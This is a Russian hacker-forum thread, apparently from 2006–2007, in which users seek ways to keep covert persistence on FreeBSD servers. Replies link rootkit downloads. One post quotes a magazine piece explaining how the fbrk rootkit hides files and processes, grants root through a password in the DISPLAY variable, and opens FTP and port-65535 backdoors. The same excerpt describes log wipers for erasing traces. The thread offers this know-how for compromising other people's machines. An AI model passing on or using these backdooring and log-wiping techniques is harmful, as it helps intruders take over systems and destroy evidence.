Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Трояним freeBSD (https://forum.antichat.xyz/showthread.php?t=21648)

zeppe1in 12.07.2006 16:42
Трояним freeBSD
 
как лучше закрепица на фряхе 4.8? фбрк вроде не катит. Какие есть идеи?

+toxa+ 12.07.2006 19:03
http://www.eviltime.com/download/rootkit/adorebsd-0.34.tar.gz

zeppe1in 12.07.2006 22:24
А ты сам его юзал? как там с глюками? и ваще пойдёт для этой версии?

MINDFLY 26.08.2006 05:34
FreeBSD rootkits
 
Нужен хороший rootkit под FreeBSD. Кто что может посоветовать ?

Ch3ck 26.08.2006 11:54
На здоровье... :)
_hxxp://www.google.ru/search?hl=ru&q=FreeBSD+rootkit+&btnG=%D0%9F%D0%BE% D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=

Desr0w 26.08.2006 13:37
Вырезка из статьи Форба в журнале Хакер.
Цитата:
Слово за FreeBSD

Согласись, несправедливо, что я описываю только linux-руткиты. Это связано с нехваткой хакерских комплектов для других систем. В частности для FreeBSD. Но не все так плохо: для фряхи существует средненький по возможностям руткит, который получил название fbrk (сокращенно от FreeBSD rootkit). Этот комплект может использоваться для FreeBSD версии 4.2-4.5.

Установить fbrk не просто, а очень просто. Достаточно запустить скрипт setup без параметров. Тебе предложат сгенерировать пароль, после чего все бинарники установятся в систему. Не стоит забывать об осторожности: я тестировал руткит на FreeBSD 4.6, после чего новые файлы перестали запускаться. Поэтому, как в случае с shv4, необходимо сделать спасительный бэкап. Прочитав readme, ты узнаешь о том, сколько всяких троянцев установится в систему. В первую очередь, fbrk хорош тем, что умеет скрывать файлы и процессы. Необходимо лишь занести их в конфиги /dev/fd/.99/.ttyf00 и /dev/fd/.99/.ttyp00 соответственно. Синтаксис конфигов также указан в readme, поэтому посылаю тебя в этот файл для детального изучения руткита :).

Чтобы получить рутовые привилегии, нужно объявить переменную окружения DISPLAY, значением которой будет заданный пароль. После этого смело запускай telnet localhost и получай абсолютные права. Если залогиниться через FTP под твоим паролем (указывается в качестве username), то руткит даст тебе удаленного рута на 21 порту. По желанию на 65535 порту будет висеть еще один бэкдор, который активирует bash после ввода хакерского пароля.

Кроме этого, руткит содержит два незаменимых логклинера, которые называются freshb (бинарный логвайпер) и fresht (текстовый логвайпер). Им достаточно указать подстроку в качестве параметра, и логи будут быстро вычищены.

Если тебе не нравится этот руткит, можешь заюзать adore для FreeBSD, благо он тоже имеется (http://packetstormsecurity.nl/groups/teso/adorebsd-0.34.tar.gz). Те же модули, те же возможности, те же баги :), но только для твоей любимой Фряхи.

[hidden] 26.08.2006 14:14
Есть мнение, что в шестой ветке этот номер не пройдет

MINDFLY 27.08.2006 01:23
Цитата:
Сообщение от Dr.Check
На здоровье... :)
_hxxp://www.google.ru/search?hl=ru&q=FreeBSD+rootkit+&btnG=%D0%9F%D0%BE% D0%B8%D1%81%D0%BA+%D0%B2+Google&lr=
Да вот в том то и дело ,что поиск ничего и не дал, поэтому то я и запостил в форум , думал то ли мне не везет, то ли ищу не правильно , пока не прочитал ответ Desr0w.

MINDFLY 27.08.2006 01:28
2 Desr0w

Да ! Вот только описываемы в вырезке руткиты я и нашел в инете и ничего более... Печально...

KPOT_f!nd 02.01.2007 17:09
Я не знаю у тебя как версия freebsd! Но вот может поможет тебе:
Цитата:
pro-hack.org/download/s_rootkits.html


Время: 19:47
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице